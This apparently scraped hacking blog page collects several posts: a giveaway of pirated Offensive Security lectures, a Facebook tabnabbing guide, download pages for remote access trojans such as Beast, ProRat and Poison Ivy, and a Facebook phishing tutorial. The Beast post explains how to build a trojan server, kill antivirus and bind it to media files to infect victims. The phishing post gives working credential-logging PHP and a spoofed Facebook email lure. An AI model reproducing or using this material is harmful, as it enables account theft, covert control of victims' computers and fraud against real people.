Real Web Application Hacking Video Lecture by Offensive Security

   Real Web Application Hacking Video Lecture by                      Offensive Security 

         

Hello friends after a long time I'm posting something on Hackingsoftwarez, I was really busy these days in Pen-Testing. Okay fine so today I'm back with an interesting article. You might know what is Offensive Security (The Creator's of Backtrack, Kali Linux & Exploit Database - also one of the most popular Penetration testing company, they also provide professional Hacking & Security course). Their course and books are really very helpful and interesting but unfortunately you've to purchase it or apply for Hacking course. So today we'll giveaway some of their real web application hacking video (Lectures by Offensive Security). It's an amazing and very much helpful for beginners and hackers.

Is this Useful for me ?

All-through, I don't know who're you but i bet you're here to learn Hacking & Security, Since yet might you'd watched many hacking videos but you'll really love this one from Offensive Security. Everyone wants to learn real hacking, - Want to know what is hacking but many of them fail to find sources and learning methods. But I say if you've curiosity and passion to learn and do something you can learn easily, Well I'm not here to inspire you my job is to share articles and make your learning more easy - since yet i'd wrote many hacking & security articles but this is one of the best I'm writing. I would prefer you to watch this video instead of doing CEH lol and I'm quite serious


Am I Eligible to Watch & Understand Lectures ? What I need to Know ?

Hmm.. one of the good question for beginners, You must know little bit about Web Application Programming & Hacking atleast basic. And please watch video in sequence, start from Part 1 to Part 4, Don't directly jump on writing exploits - it's pretty hard. Do not skip anything until you understand - If you do not understand anything please google it there is a ton of information.



I'll strongly recommend all beginners to download and understand these real Web Application Hacking Lectures (by Offensive Security). They'd almost explained everything about Web Application Hacking. Amazing for beginners to learn something new. Don't miss it, Download from below links.

How to Download All Videos

However this time i've not uploaded any video on my own server it's somewhere on other location. If you want to learn step by step how to download those videos click here and read this Short Word file with 5 Easy steps to download amazing hacking videos lectures.

                                                   Click Here To Know How to Download

Thank you for reading my post, If you like it please share it and increase us. If you've any kind of doubt please feel free to comment or dare to ask. 

Read More

How to Hack Facebook Accounts by Tabnabbing?

          How to Hack Facebook Accounts by Tabnabbing?

I hope you all are aware of the phishing and how it is used for stealing and hacking account passwords.

A more advanced attack to Phishing is Tabnabbing. 

Ok. Lets start...

                                   

Things you need for Tabnabbing: 

1. A Free Web Hosting Account - You can use110mb.com or ripway.com

2. You should have the following files which are required for tabnabbing.   

1. Facebook.html  -Fake Facebook login page (phisher) 

2. login.php - Script which captures the login details of the victim

3. google.html - Standard google page used to trick the user

4. tabnabb.js - Java script which is required for tabnabbing

1. First a fall  download all  the files and extract them using winrar or win-zip, Then upload  facebook.html ,login.php & google.html to your free web webhosting account.

2. Now open tabnabb.js using a notepad , Search for "Enter your URL here" , Now replace it with your "Facebook.html" url which you uploaded in the previous step, finally save it and upload  tabnabb.js to your hosting account

3. By now you should have successfully uploaded all the four files to your hosting account.

4. Now to check whether the hack is working, click on the google.html link and open it , Now open few new tabs , After some time you will see google page switched to your fake Facebook page

5. Now once the victim enters all his credentials in our fake facebook login page and clicks login, he will be redirected to Facebook.com/careers  page to avoid suspecion

6. To see the victim login details go to your hosting account where you will see a new file "log.txt" Open it to see the victims user-id and password.

You can use the same techniques to hack other account passwords like Paypal, Gmail, Twitter etc. But you have to use different html pages.

Good luck and happy hacking...

Read More

Polipo v1.0.4 Free Download

                             Polipo v1.0.4 Free Download

Polipo is a small and fast caching web proxy (a web cache, an HTTP proxy, a proxy server). While Polipo was designed to be used by one person or a small group of people, there is nothing that prevents it from being used by a larger group.

Polipo has some features that are, as far as I know, unique among currently available proxies:

                                                           

Polipo will use HTTP/1.1 pipelining if it believes that the remote server supports it, whether the incoming requests are pipelined or come in simultaneously on multiple connections (this is more than the simple usage of persistent connections, which is done by e.g. Squid);

Polipo will cache the initial segment of an instance if the download has been interrupted, and, if necessary, complete it later using Range requests;

Polipo will upgrade client requests to HTTP/1.1 even if they come in as HTTP/1.0, and up- or downgrade server replies to the client's capabilities (this may involve conversion to or from the HTTP/1.1 chunked encoding);

Polipo has complete support for IPv6 (except for scoped (link-local) addresses).

Polipo can optionally use a technique known as Poor Man's Multiplexing to reduce latency even further. 

                                    

                                                       

 In short, Polipo uses a plethora of techniques to make web browsing (seem) faster.

DOWNLOAD

Read More

Beast v2.07 Complete tutorial and Download

                  Beast v2.07 Complete tutorial and Download

Beast is a Trojan Maker. Turn off all Anti-Virus, While in Use. Lets Start from the Top Left to the Bottom right. The Host is the Person your connecting to. The Port is the Open Hole or Backdoor to the computer which you will Use to View and Control their Computer. The Password is the password you set to acess the Port. The Go-Beast Button is basically the Connect Button which connects your Computer to the Computer with the Server. The Next Port Button is for SIN (A different and Easier BackDoor).

The Start Listening Button is The same as the Go-Beast Button except it Connects to the SIN port. The Build Server Button is Basically to Make a Program that Opens that Backdoor you need. When the Build Server Button is Clicked a New Window will appear. The Window Will Provide different options for your Server. The First Option Button on the Left is the Basic Button. The Basic Button will provide options for the Basic's of your Server. Starting on the Left the SIN Port is the Port or Backdoor you want Opened. Reverse Connection is Basically saying you want to Use the SIN Method which I Recommend because its lots Easier. The other Method (Right) is the Direct Connection Method. Listen Port is the Port or Backdoor you want opened. The Password is the Password you want to set on your Port or Backdoor. The Direct Connection Box is Basically saying yes to Using the Direct Connection Method which I disregard due to the work of finding the Persons IP and having to remember a Password. The Injections are if you want to Inject the Server into a Program or a Process. And the Residing is where you want your sever to be located. The Second Button down from top is the Notifications Button. This Button Tells you all the Ways of getting Keylogging info from your Host and other information. The Third Button from the Top is the Startup Button. As the Name Says. I reconmmend you have them all Checked. The Button Fourth From Top is The Anti-Virus + Firewall Kill Button. This Button Will give you option on what anti Virus and firewalls you want killed or turned off. The Button Fifth From Bottom is Misc. Button. It Gives you Options like An Error Message, Enabling the Keylogger, etc. The Button sixth from the top is the Exe icon. The Icon that the Server will have. Bottom of this Window is the Save and Load which to save the Current Settings of the Server you made. The Load Button is the Button to Load any Previous Saves You Saved before. Save Server Button is to make the Server. The Server Will then appear in the folder or area your Beast 2.07 application is Located. Back to the Original Window you will see may buttons on the Medium Right to Bottom Right. These Buttons are Basically to Do whatever you want to the Computer. See their Screen, interact with the Screen. Make Folders. Destroy, format, it never ends. Now here comes the hard part. I will only explain the SIN port method because using the Host (IP) method is time consuming and wasteful Now lets say you made your server And you use the Reverse Connection method (SIN) and you set your Port to 1234. You now have to get that Server to Whom you want to Troj. Now if the Person you want to Trojan is a dumbass and has no anti-virus and or firewall you shouldn't have any problems getting the Server to Them. Now if your Friend is not so dumb and has firewall and or anti-virus you may have to encrypt it and or bind it with another file like a Picture or a Mp3 file. And you once you find a way to get it to whom your Trojing, and they click on it. Just Type the Port you set on your server click the Start Listening Button and Wahla. Your in and ready to go. Start Watching and Controlling their Computer. It may take awhile for the Server to Pop-Up but it will.

DOWNLOAD

Read More

Netbus v1.7 - Download

                                           Netbus v1.7 - Download

Netbus is a hacking Software by Carl-Fredrik Neikter a Swedish hacker and created by Delphi. This program works under Windows 95/98/Me/2000/XP and NT. Netbus first appeared in 1998 with 1.60 version and Netbus 1.70 version. There are also Netbus Pro v2.01 and Netbus Pro v2.10, released in 1999. Until now, Netbus still be one of the computer security threats.

In my previous post i have given you download link for Netbus v1.6, Here i am providing you Netbus v1.7.

DOWNLOAD Netbus v1.7

Read More

Prorat Tutorial and Download

                              Prorat Tutorial and Download

PRORAT is a powerfull Remote administrator tool (RAT) or you can say it a Trojan. ProRat is written in C++  and it can work with all windows operating systems.

Like all remote administration tools prorat also works in Server and Clint format. First you have to build the server using the clint software and send it to the victim. Once your victim installs the server on his system, then it will send the Port number, IP address to the address provided while bulding the server. Thats it. Now you have to enter IP and Port and connect to the victims system using Clint Software.

You can use prorat either for a legel connection or for the hacking purpose.

DOWNLOAD

Read More

                    Bitfrost v1.2.1 RAT - Download

Bifrost is an advanced Remote Administration Tool that allows you to remotely control computers that are behind firewalls and routers.

In this version the bypassing method has been developed futher and it is again ably to silently to connect through most hardware and software firewalls.

Features:

Cam Capture, File Manager, File Search, Offline/Online Keylogger, Password List (protected storage, cached passwords, icq, cd keys), Polymorphic Plugin, Process List, Remote Shell, Screen Capture, System Info and Windows List.

The main target when developing Bifrost has always been: 1. Stability 2. Better fwb than most other rats 3. Easy to use.

When v1.1 was released 2.5 years ago, it would bypass all software firewalls back then. This because it's injection technique combined with methods to avoid user and kernel level hooks (fwb+).

This has been the main focus when developing this version, so the server has been rewritten and the fwb improved futher. Provided it's an XP and the user is logged in as admin, it is able to silently bypass most software firewalls.

DOWNLOAD

Read More

Poison Ivy v2.3.2 RAT - Free download

                       Poison Ivy v2.3.2 RAT - Free download

Poison Ivy is in my view, the best Remote administration tool. A Remote Administration Tool (known more commonly on the Internet as a RAT) is used to remotely connect and manage a single or multiple computers with a variety of tools, such as:

* Screen/camera capture or control

* File management

* Shell control

* Computer Control

* Registry management

* Other product-specific function ( Source: Wikipedia )

It consists of huge number of features that enable the attacker more ease in attacking a target. It is the most widely used RAT among the Script kiddies as well as Programmers. 

It consists of features like password stealing, keylogging and many more...

The latest vesion of this RAT is "Poison Ivy v2.3.2". You can download this from the link given below. If you have any doubts regarding its use etc, feel free to ask me...

Keep visiting my site for more hacking tools and tutorials... You can find my other RAT'S and download them

DOWNLOAD

Read More

                Shark v2.2 Remote Administration Tool

Shark v2.2 is one of the easy to use RATs. A Remote Administration Tool (known more commonly on the Internet as a RAT) is used to remotely connect and manage a single or multiple computers with a variety of tools, such as:

* Screen/camera capture or control

* File management

* Shell control

* Computer Control

* Registry management

* Other product-specific function ( Source: Wikipedia )

It consists of huge number of features that enable the attacker more ease in attacking a target. It is the most widely used RAT among the Script kiddies as well as Programmers. It consists of features like password stealing, keylogging and many more...

The latest vesion of this RAT is "Shark v2.2". If you have any doubts regarding its use etc, feel free to ask me...

I will provide you its download link in few days...

Keep visiting my site for more hacking tools and tutorials... You can find my other RAT'S HERE and download them.. 

Read More

Cyber Gate v1.07.5 Free Download

                                  Cyber Gate v1.07.5 Free Download

CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim's passwords and can also get the screen shots of his computer's screen. You can connect o multiple victims in single time. One should no know what is the ip-address of the victims' computers. That is the main benefit. What you have to do is to spread the server file to the vicitms or the people whom you want to infect. Also there is a file manager utility using which you can explore the data of the victim. 

DOWNLOAD

Read More

                         Turkojan v4 RAT - Download

Turkojan is one of my favorite Remote Administration tools. I personally prefer Turkojan to Prorat because in prorat you have find out your victims IP address. But in case of Turkojan the server itself let you know whenever the victim is live over internet.

Turkojan also have a lot of tools similar to all the other Remote administration tools does.

Turkojan Screenshot:

Download Turkojan v4 

Read More

Facebook Phishing Tutorial

                                      Facebook Phishing Tutorial

Here I will show you how you can create fake facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password.

                                                             

You need 3 files Index.html, phish.php, passwords.txt to create a fake facebook login page.

To create index.html:

First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu. Once done you will have a file named “index.html” and a folder named “index_files”. Folder will have several files in it, let them as it is and open index.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with action= “phish.php” and also change the method in html from 'post' to 'get'.
save the document.

To create phish.php:

Now open notepad type following php code in it and create phish.php.


<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Now simply create text document and rename it as passwords.txt

Now you'll need a free web hosting service that supports PHP. I suggest you to use http://www.000webhost.com/

Open the site and create an account. Once you have created your account, you login to your account and go to control panel.
In the control panel choose file manager and upload the 3 files index.html, phish.php, passwords.txt in public directory.

Now create a new directory there and name it as index_files. Now open it and upload all the files in index_files folder formed while saving facebook page to it.

Don't forget to change Chmod permissions for passwords.txt to 777. Once done make index.html your index page and make site live.

Now create a spoofed email using my Anonymous mailer, from support@facebook.com to your victim.

Sub: Invalid activity on your facebook account.

Body:

Hey (victim's facebook user name),

Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,

<link to phished site> normally it will be http://yourusername.somex.com/index.html

Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com, 

Facebook, Inc,

1601 S.California Ave

Palo Alto CA 94394

US

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in passwords.txt file. 

Please note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.

Countermeasure:

You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.

Download files from the following link.

DOWNLOAD

Read More

HOW TO GET FACEBOOK PROFILE ID & FACEBOOK PAGE ID

HOW TO GET YOUR PROFILE & PAGE ID ON FACEBOOK

As you know that,Every Facebook profile or page & profile has unique ID and no other can get to know about it except you yourself so, make it more unique by knowing it !!

This is one of the greatest achievements among the tricks that had been used with regard to Facebook.

Once you get to know your secret ID and the profile that is actually yours and hence related directly to your account you would get more and more chances of hiding and Facebook hence can guarantee you the secrecy of your data,information and personal elements.

HOW ID COULD BE USEFUL

1 ) You can use this ID as a username in your login.

2 ) For tagging name in comment or post @[your id:]

For example 

my profile at Facebook saikiran

3 ) It shall be helping you in making morefriends and promotion on facebook

& many more

Read More